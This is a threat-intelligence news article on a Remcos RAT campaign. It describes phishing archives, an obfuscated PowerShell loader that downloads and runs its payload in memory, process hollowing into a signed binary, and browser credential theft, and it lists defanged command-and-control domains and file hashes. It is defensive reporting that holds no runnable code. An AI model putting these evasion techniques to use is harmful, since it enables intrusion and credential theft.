CyberProof researchers have observed a recent surge in Remcos Remote Access Trojan (RAT) infections in September and October 2025.
The malware campaign, distributed primarily through email attachments and social engineering lures, accounted for roughly 11% of all infostealer incidents during the quarter.
Although marketed as a legitimate remote administration tool, Remcos continues to be abused by threat actors for full-scale credential theft and persistence operations.
Malspam Drops Obfuscated PowerShell Loader
In the most recent attack analyzed by CyberProof’s Threat Research team, victims received phishing emails containing an archive named ‘EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz’. When extracted, it dropped a batch file that executed an obfuscated PowerShell script.
The script demonstrated heavy code obfuscation using custom functions such as Lotusblo and Garrots to evade static detection and signature-based scanners.
Upon execution, the PowerShell loader created a hidden process and established TLS 1.2 web requests to hxxps://icebergtbilisi.ge/Sluknin.afm, attempting continuous downloads of an encoded payload.
After retrieving and Base64-decoding the data, the loader decompressed it using GZip and executed it directly in memory via Invoke-Expression, confirming the use of a fileless execution chain. The downloaded payload was identified as the Remcos RAT.
The PowerShell code then launched msiexec.exe, which executed additional commands and performed process hollowing to inject its malicious payload into RmClient.exe, a legitimate Microsoft-distributed binary.
Telemetry logs showed subsequent attempts to access browser credential storage, triggering partial EDR alerts that revealed the credential-theft functionality.
The RMClient binary involved in this injection was cryptographically validated as genuine, highlighting the attacker’s precision in exploiting trusted binaries to bypass endpoint defenses.
Credential Theft and Network Indicators
Analysis of system timelines and network telemetry linked the msiexec process to external command-and-control connections, including the domains ablelifepurelife[.]ydns.eu, ablelifepurelifebk[.]ydns.eu, and icebergtbilisi[.]ge.
The attack temporarily stored payloads in the AppData\Roaming\Hereni.The Gen directory contains several random temporary files dropped in user profile paths.
CyberProof’s custom hunting query for rmclient.exe processes spawned from temporary directories successfully correlated multiple intrusion events.
Hash analysis confirmed the involvement of PowerShell loaders and scripts with SHA256 values 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e and 3ec5b13ee66d84dd75ac619ebb79c64cef7986dd6e8049f689f9ac39c272fea2.
Email attachments, disguised as corporate order inquiries, carried distinctive filenames across regions, including German, Polish, and Portuguese variants.
CyberProof emphasizes that this campaign’s sophistication lies in its stealthy, fileless infection method and credential-theft motivation.
As attackers continue refining obfuscation and process injection methods, organizations are urged to strengthen their detection layers and maintain vigilance toward targeted phishing lures.
Indicators of Compromise
- Ablelifepurelife[.]ydns.eu
- ablelifepurelifebk[.]ydns.eu
- icebergtbilisi[.]ge
- Email attachment name: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz
- Attachment hash: 5eb460204cd0f5510b146b8465b4392e9d0795b5d7fdb51b1c1429f97593a4b3
- Batch script file: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat
- Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
 infections in September.){kind=link}